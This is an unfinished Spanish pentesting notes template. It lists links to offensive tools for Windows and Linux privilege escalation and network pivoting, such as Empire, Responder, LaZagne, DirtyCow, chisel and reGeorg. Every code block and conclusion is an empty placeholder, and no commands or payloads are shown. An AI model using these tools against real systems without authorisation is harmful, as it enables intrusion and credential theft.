CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EMPIRE POWERSHELL Y LINUX --------------------------------->https://www.kali.org/tools/powershell-empire/ -->https://github.com/EmpireProject/Empire
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LOLBAS --------------------------------->https://lolbas-project.github.io/#
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WADCOMS comandos --------------------------------->https://wadcoms.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HIJACKLIBS DLL --------------------------------->https://hijacklibs.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRINTSPOOFER --------------------------------->https://github.com/itm4n/PrintSpoofer
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ROGUEWINRM --------------------------------->https://github.com/antonioCoco/RogueWinRM
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WINDOWSPRIVESC metodos --------------------------------->https://github.com/debiantano/WindowsPrivesc
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
POWERSPLOIT --------------------------------->https://www.kali.org/tools/powersploit/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
EVIL-WINRM --------------------------------->https://www.kali.org/tools/evil-winrm/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

ESCALADA DE PRIVILEGIOS LINUX

METASPLOIT --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LaZagne --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GTFObins --------------------------------->https://gtfobins.github.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX KERNEL CVEs --------------------------------->https://www.linuxkernelcves.com/cves
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINENUM --------------------------------->https://github.com/rebootuser/LinEnum
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINPEAS --------------------------------->https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ENUMERACION SMART LINUX --------------------------------->https://github.com/diego-treitos/linux-smart-enumeration
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUXPRIVCHECKER --------------------------------->https://github.com/sleventyeleven/linuxprivchecker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LINUX EXPLOIT SUGGESTER --------------------------------->https://github.com/The-Z-Labs/linux-exploit-suggester
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HACKTRICKS --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHKROOTKIT --------------------------------->https://github.com/Magentron/chkrootkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
LYNIS --------------------------------->https://github.com/CISOfy/lynis
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
UNIX-PRIVESC-CHECK --------------------------------->https://github.com/pentestmonkey/unix-privesc-check
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRDTYCOW --------------------------------->https://github.com/firefart/dirtycow
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PRIV-ESCALATION metodos --------------------------------->https://github.com/KevinLiebergen/priv-escalation
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FILESEC GTFO win y linux --------------------------------->https://filesec.io/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RESPONDER --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

PIVOTING

SSH TUNNELS --------------------------------->https://www.openssh.com/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
PROXYCHAINS --------------------------------->https://github.com/rofl0r/proxychains-ng
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SOCAT --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCAT --------------------------------->https://nmap.org/ncat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CHISEL --------------------------------->https://github.com/jpillora/chisel--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CORKSCREW --------------------------------->https://github.com/bryanpkc/corkscrew
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT --------------------------------->https://github.com/rapid7/metasploit-framework
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METERPRETER --------------------------------->https://www.metasploit.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
REGEORG --------------------------------->https://github.com/sensepost/reGeorg
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RPIVOT --------------------------------->https://github.com/klsecservices/rpivot
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR... --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

Last updated 1 year ago

hashtagAUDITORIA DE: ((Laboratorio: XSS almacenado en contexto HTML sin nada codificado))

hashtagRECONOCIMIENTO PASIVO

hashtagANALISIS FORENSE

hashtagRECONOCIMIENTO ACTIVO

hashtagINVESTIGACION OSINT

hashtagHASHES Y DESENCRIPTADOS

hashtagFUERZA BRUTA A LOGINS

hashtagSCRIPT DE EXPLOIT Y PAYLOADS

hashtagEXPLOTACION

hashtagESCALADA DE PRIVILEGIOS WINDOWS

hashtagESCALADA DE PRIVILEGIOS LINUX

hashtagPIVOTING